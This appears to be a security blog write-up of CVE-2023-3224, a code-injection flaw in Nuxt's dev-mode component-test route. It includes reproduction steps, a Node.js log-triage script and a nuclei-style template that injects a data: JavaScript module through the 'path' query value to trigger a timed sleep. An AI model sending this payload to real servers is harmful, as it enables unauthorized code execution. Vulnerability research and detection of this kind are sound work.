CVE-2023-3224 Nuxt dev mode rce
source link: https://y4er.com/posts/cve-2023-3224-nuxt-dev-mode-rce/
https://nuxt.com/docs/examples/essentials/hello-world
Create the files as shown there, then change the nuxt version number in package.json:

    {
      "name": "example-hello-world",
      "private": true,
      "scripts": {
        "build": "nuxi build",
        "dev": "nuxi dev",
        "start": "nuxi preview"
      },
      "devDependencies": {
        "nuxt": "3.5.0"
      }
    }
https://github.com/nuxt/nuxt/commit/65a8f4eb3ef1b249a95fd59e323835a96428baff
If the server is running in dev mode and the requested URL starts with /__nuxt_component_test__/, #build/test-component-wrapper.mjs is imported. That wrapper takes the query string and passes it to import(), which results in RCE.

Importing child_process to execute commands returns a 500 error, so a different gadget from node_modules is needed in that case.

When writing the template you have to decide how to verify the result. Some targets cannot execute commands, so I simply used a sleep delay for detection. I then found that nuxt caches during rendering: if two payloads are identical it only sleeps once, so I added a random number.
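As an added example (not from the original post or from Nuxt), the following Node.js script triages access-log lines for requests to the dev-only route described above and classifies the `path` value that the wrapper hands to import(); the log lines and the package name `pkg` are constructed for this example.

```javascript
// Added example (not part of the original post or of Nuxt): flag requests to
// the dev-only /__nuxt_component_test__/ route and classify the `path` query
// value that test-component-wrapper.mjs passes to import().
// The access-log lines below are constructed for this example.
const SUSPECT_ROUTE = '/__nuxt_component_test__/';
// Common Log Format: ip ident user [time] "METHOD target PROTO" status
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

const SAMPLE_LOG = [
  '10.0.0.5 - - [05/Jun/2023:10:00:01 +0000] "GET / HTTP/1.1" 200 512',
  '10.0.0.7 - - [05/Jun/2023:10:00:02 +0000] "GET /__nuxt_component_test__/?path=data:text/javascript,export%20default%201 HTTP/1.1" 500 0',
  '10.0.0.9 - - [05/Jun/2023:10:00:03 +0000] "GET /__nuxt_component_test__/?path=../node_modules/pkg/index.mjs HTTP/1.1" 200 42',
  '10.0.0.2 - - [05/Jun/2023:10:00:04 +0000] "GET /__nuxt_component_test__/?path=./components/Hello.vue HTTP/1.1" 200 1024',
];

// Classify what import() would receive: a specifier with a URL scheme
// (data:, http:, file:) or one reaching into node_modules / parent
// directories matches the pattern described above; a plain project-relative
// path is what the dev tooling itself sends.
function classifyPath(pathParam) {
  if (pathParam === null) return 'missing-path';
  if (/^[a-z][a-z0-9+.-]*:/i.test(pathParam)) return 'scheme-specifier';
  const segs = pathParam.split(/[\\/]/);
  if (segs.includes('..') || segs.includes('node_modules')) return 'traversal-or-dependency';
  return 'project-relative';
}

// Returns null for lines that do not touch the route, otherwise a finding.
function scanLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const [, ip, ts, method, target, status] = m;
  if (!target.startsWith(SUSPECT_ROUTE)) return null;
  // searchParams percent-decodes, so encoded payloads are classified too.
  const pathParam = new URL(target, 'http://localhost').searchParams.get('path');
  return { ip, ts, method, status: Number(status), pathParam, kind: classifyPath(pathParam) };
}

function scanLog(lines) {
  return lines.map(scanLine).filter((f) => f !== null);
}

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`${f.ts} ${f.ip} ${f.kind}: ${f.pathParam}`);
}
```

Any hit on this route outside a developer's own machine is worth a look, since the route only exists in dev mode.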
    id: CVE-2023-3224

    info:
      name: nuxt developer mode RCE
      author: Y4er
      severity: critical
      description: |
        RCE in developer mode in nuxt/nuxt
      reference:
        - https://huntr.dev/bounties/1eb74fd8-0258-4c1f-a904-83b52e373a87/
      classification:
        cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
        cvss-score: 8.1
        cve-id: CVE-2023-3224
        cwe-id: CWE-94
      tags: cve,cve2023,rce,http,vmware

    http:
      - method: GET
        path:
          - "{{BaseURL}}/__nuxt_component_test__/?path=data:text/javascript,await%20new%20Promise(resolve%20=%3E%20setTimeout(resolve,%206000));console.log('{{randstr}}')"
        req-condition: true
        matchers:
          - type: dsl
            dsl:
              - 'duration>=5'
https://huntr.dev/bounties/1eb74fd8-0258-4c1f-a904-83b52e373a87/
My writing is poor, the wording flippant, the content shallow and the technique clumsy. Pointers and corrections from the masters are very welcome, with thanks.